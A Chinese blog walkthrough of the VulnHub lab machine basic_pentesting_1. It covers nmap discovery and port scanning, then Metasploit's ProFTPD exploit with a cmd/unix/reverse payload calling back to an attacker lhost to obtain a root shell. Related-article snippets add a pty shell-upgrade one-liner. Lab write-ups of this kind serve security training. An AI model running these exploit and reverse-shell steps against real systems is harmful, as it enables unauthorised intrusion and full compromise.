vulnhub系列:basic_pentesting_1

最新推荐文章于 2024-09-07 16:53:09 发布
最新推荐文章于 2024-09-07 16:53:09 发布
阅读量160 收藏 1
点赞数 1
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140908606
版权

vulnhub系列:basic_pentesting_1

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240803172726657

nmap扫描端口,开放端口:21、22、80

nmap 192.168.23.176 -p- -A -sV -Pn

image-20240803172833222

访问80端口,提示没有添加任何内容

image-20240803173029497

kali使用msfconsole查找漏洞

msfconsole

search ProFTPD

image-20240803173339929

二、getshell

可以看到第五个是符合版本的(之前扫描端口的版本),使用并查看配置信息

use 5
options

image-20240803173720287

需要配置rhosts

set rhosts 192.168.23.176

image-20240803173907092

设置payload

set payload cmd/unix/reverse

image-20240803174024918

查看配置,还需要配置监听地址

options

image-20240803174055583

配置lhost

set lhost 192.168.23.133

image-20240803174227853

输入run开始执行,成功getshell,发现已经是root权限

image-20240803174331174

三天三夜睡不着
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 791
靶场提权
RustScan::robot_face:现代端口扫描仪:robot_face:
02-02
:right_arrow_selector: | | :left_arrow_selector: 现代端口扫描仪。 快速,智能,有效。 docker pull rustscan/rustscan:2.0.0 yay -S rustscan brew install rustscan :thinking_face: 这是什么?...
[Vulnhub] basic_pentesting_1
weixin_46739058的博客
05-08 862
vulnhub靶场:basic_pentesting 适合新手,难度较低
Vulnhubbasic_pentesting_1
zhangshuaiijie的博客
06-29 169
三个端口,ftp,ssh,http看来突破口不在网站上,那就看看是不是ftp,ssh和apache的问题,nmap扫描版本这个版本正确,而且msf上有。
Vulnhub靶机:basic_pentesting_1
qq_48904485的博客
02-29 452
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
java红酒网站源码-pentesting_Notes:pentesting_Notes
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
Ciphey::high_voltage:在不知道密钥或密码的情况下自动解密加密,解码编码和破解哈希:high_voltage:
01-30
翻译 :right_arrow_selector: | | :left_arrow_selector: 使用自然语言处理和人工智能以及一些常识的全自动解密/解码/破解工具。 python3 -m pip install ciphey --upgrade docker run -it --rm remnux/ciphey...
endgame:AWS Pentesting工具,可让您使用单行命令将流氓AWS账户后门AWS账户的资源-或与整个Internet共享资源:smiling_face_with_horns:
03-04
一个AWS Pentesting工具,可让您使用单一命令将流氓AWS账户后门AWS账户的资源-或与整个Internet共享资源 :smiling_face_with_horns: TL; DR : endgame smash --service all通过与恶意IAM用户/角色或整个Internet...
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 680
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
BasicPentesting:从TryHackMe清除基本渗透测试室
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到jan和kay ) 密码( jan: armando使用SSH通过Hydra找到) 密码( kay: beeswax在linPEAS中获得带有scalloning的rsa-id后,通过John通过发现的kay: beeswax ) 上一个密码(以下是heresareallystrongpasswordthatfollowsthepasswordpolicy$$在凯氏登录中找到的输入密码heresareallystrongpasswordthatfollowsthepasswordpolicy$$密码) 在ssh服务器中,使用与John一起
LinEnum.zip
08-24
LinEnum是一款在linux系统使用的辅助提权脚本,它能够帮助你找到系统的弱点,从而方便提权。
basic_pentesting1靶机
qq_68865419的博客
10-19 252
这次我们使用一种新方法查看靶机的ipNetdiscover:二层发现工具,拥有主动和被动发现两种方式。首先查看靶机的ip​​​​​​然后查看本机的ip,使用ipconfig然后扫描靶机ip。
靶场练习第五天~vulnhub靶场之basic_pentesting_1
qq_57976347的博客
01-30 775
一、信息收集 1.主机发现 (1)Netdiscover:专用的二层发现工具,拥有主动和被动发现两种方式 具体操作如下,查看一下kali的ip 然后使用命令sudo netdiscover,发现了靶机的ip 2.端口扫描,服务识别 (1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测,使用方法:nmap -A 192.168.101.106 二、后渗透 1.根据服务版本搜索相关漏洞 这里用到msfconsole,关于msfconsole介绍:msfconsole..
basic_pentesting_1靶机渗透
weixin_64809022的博客
06-23 760
Python提权: python3 -c 'import pty;pty.spawn("/bin/bash")'
BASIC-PENTESTING-1 靶机提权
weixin_41082546的博客
08-11 1136
basic-pentesting-1 https://www.vulnhub.com/entry/basic-pentesting-1,216/ 获取ip地址 端口扫描,服务识别 根据服务版本搜索相关漏洞 通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有 于是使用msf 搜索漏洞模块并利用 use exploit/unix/ftp/proftpd...
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 905
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
如何启动网络安全计划:首先要做的事情
最新发布
网络研究观
09-07 911
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
构建高级渗透测试虚拟实验室:实践与专业技巧
《构建高级渗透测试虚拟实验室》(Building Virtual Pentesting Labs for Advanced Penetration Testing, PACKT, 2014)是一本专注于指导读者如何构建自己的虚拟渗透测试实验室的专业教材。在当前网络安全形势日益严峻...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值